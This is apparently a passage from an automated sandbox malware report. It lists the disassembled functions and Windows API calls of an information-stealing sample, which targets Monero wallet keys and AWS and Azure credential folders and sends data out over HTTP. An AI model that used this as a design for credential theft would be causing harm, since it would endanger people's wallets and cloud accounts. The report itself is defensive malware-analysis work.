                            • InternetCloseHandle.WININET(00000000), ref: 00385FBD
                            • HttpOpenRequestA.WININET(00000000,0115E788,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00385BF8
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • InternetCloseHandle.WININET(00000000), ref: 00385FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 00df2adc4000d09b53eae8678efdfaaa9e588b00ec2ac04a8b1d027ffdfd257b
                            • Instruction ID: be3b68a4fe207f6e16eb3c53e2707aad3ccbfd44fc96c5b2f39c305df34fd96b
                            • Opcode Fuzzy Hash: 00df2adc4000d09b53eae8678efdfaaa9e588b00ec2ac04a8b1d027ffdfd257b
                            • Instruction Fuzzy Hash: C712F171820528ABDF16EBA0DC95FEEB778BF14700F504299F10A66091EF702A49DFA5
                            Function 0038CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0038D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0038D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D208
                            • lstrcat.KERNEL32(?,003A1478), ref: 0038D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D22A
                            • lstrcat.KERNEL32(?,003A147C), ref: 0038D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D24C
                            • lstrcat.KERNEL32(?,003A1480), ref: 0038D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D26E
                            • lstrcat.KERNEL32(?,003A1484), ref: 0038D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D290
                            • lstrcat.KERNEL32(?,003A1488), ref: 0038D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D2B2
                            • lstrcat.KERNEL32(?,003A148C), ref: 0038D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D2D4
                            • lstrcat.KERNEL32(?,003A1490), ref: 0038D2E3
                              • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                              • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                            • lstrlen.KERNEL32(?), ref: 0038D32A
                            • lstrlen.KERNEL32(?), ref: 0038D339
                              • Part of subcall function 0039AA70: StrCmpCA.SHLWAPI(01159110,0038A7A7,?,0038A7A7,01159110), ref: 0039AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0038D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                            • Instruction ID: 57da89655aa0ababfb5db5da74ec57371d1a6649ca0afadb32593545044f7eda
                            • Opcode Fuzzy Hash: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                            • Instruction Fuzzy Hash: 08E11F71910518AFCF06EBA0DD96EEE7778BF24305F104258F106BA091DF35AE09DBA2
                            Function 00384880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00384915
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 0038493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00384ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003A0DDB,00000000,?,?,00000000,?,",00000000,?,0115E758), ref: 00384DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00384E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00384E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00384E49
                            • InternetCloseHandle.WININET(00000000), ref: 00384EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00384EC5
                            • HttpOpenRequestA.WININET(00000000,0115E788,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00384B15
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • InternetCloseHandle.WININET(00000000), ref: 00384ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                            • Instruction ID: eb82dbc147df63bf3853bbf4796108b4aa75eb66df94355a39ca6133160286d9
                            • Opcode Fuzzy Hash: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                            • Instruction Fuzzy Hash: 8712D0729206189ADF16EB90DC92FEEB778BF55300F504299F10666091EF702F49DFA2
                            Function 0038C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0115CE08,00000000,?,003A144C,00000000,?,?), ref: 0038CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0038CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0038CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0038CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0038CAD9
                            • StrStrA.SHLWAPI(?,0115CE98,003A0B52), ref: 0038CAF7
                            • StrStrA.SHLWAPI(00000000,0115D000), ref: 0038CB1E
                            • StrStrA.SHLWAPI(?,0115DBC0,00000000,?,003A1458,00000000,?,00000000,00000000,?,011590F0,00000000,?,003A1454,00000000,?), ref: 0038CCA2
                            • StrStrA.SHLWAPI(00000000,0115DB20), ref: 0038CCB9
                              • Part of subcall function 0038C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                              • Part of subcall function 0038C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                            • StrStrA.SHLWAPI(?,0115DB20,00000000,?,003A145C,00000000,?,00000000,01159100), ref: 0038CD5A
                            • StrStrA.SHLWAPI(00000000,01158E60), ref: 0038CD71
                              • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                              • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                              • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                            • lstrlen.KERNEL32(00000000), ref: 0038CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0038CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                            • Instruction ID: 7dd43e767064e1c80c8013c557f8a26ca7a028b7bcd8e73447b1425395b13a2d
                            • Opcode Fuzzy Hash: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                            • Instruction Fuzzy Hash: FAE1FF71910518AFDF16EBA4DC95FEEBB78BF14300F404259F1066B191EF306A4ADBA2
                            Function 00398320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • RegOpenKeyExA.ADVAPI32(00000000,0115B328,00000000,00020019,00000000,003A05B6), ref: 003983A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                            • wsprintfA.USER32 ref: 00398459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                            • Instruction ID: b8eda88b2d5f85d38733ddd5ca4848b362f4c748ae964b407b8f8b58f20f80f7
                            • Opcode Fuzzy Hash: 37553fbb7cd592ea49218206f0a6177991c26312428163116ad643566d3f56c2
                            • Instruction Fuzzy Hash: 2381F97191051CABEB29DB60CD95FEAB7B8FF58704F008298E109A6140DF716A89CFE1
                            Function 00394D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00394DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00394DCD
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                              • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                            • lstrcat.KERNEL32(?,00000000), ref: 00394E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00394E59
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                              • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                              • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00394EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00394EE5
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949B0
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A08D2), ref: 003949C5
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949E2
                              • Part of subcall function 00394910: PathMatchSpecA.SHLWAPI(?,?), ref: 00394A1E
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,0115E858), ref: 00394A4A
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FF8), ref: 00394A5C
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A70
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FFC), ref: 00394A82
                              • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A96
                              • Part of subcall function 00394910: CopyFileA.KERNEL32(?,?,00000001), ref: 00394AAC
                              • Part of subcall function 00394910: DeleteFileA.KERNEL32(?), ref: 00394B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                            • Instruction ID: 493463e42798e4a39787ae4a3b0a2ce115735d518e0fe9308e637d7a47357c43
                            • Opcode Fuzzy Hash: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                            • Instruction Fuzzy Hash: C241D6BA95030867DB15F760EC47FEE3738AB65704F004494B245AA0C1FEB45BC98B92
                            Function 00399010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0039906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                            • Instruction ID: b404a8fc6ae3ca88664d2b0bbf89bb520614bb79288eb632cfdf71adab80f500
                            • Opcode Fuzzy Hash: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                            • Instruction Fuzzy Hash: A371DA75910608AFDB04EBE4DC89FEEBBB8FB58704F108508F516AB290DB34A945DB61
                            Function 00392E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003931C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0039335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003934EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
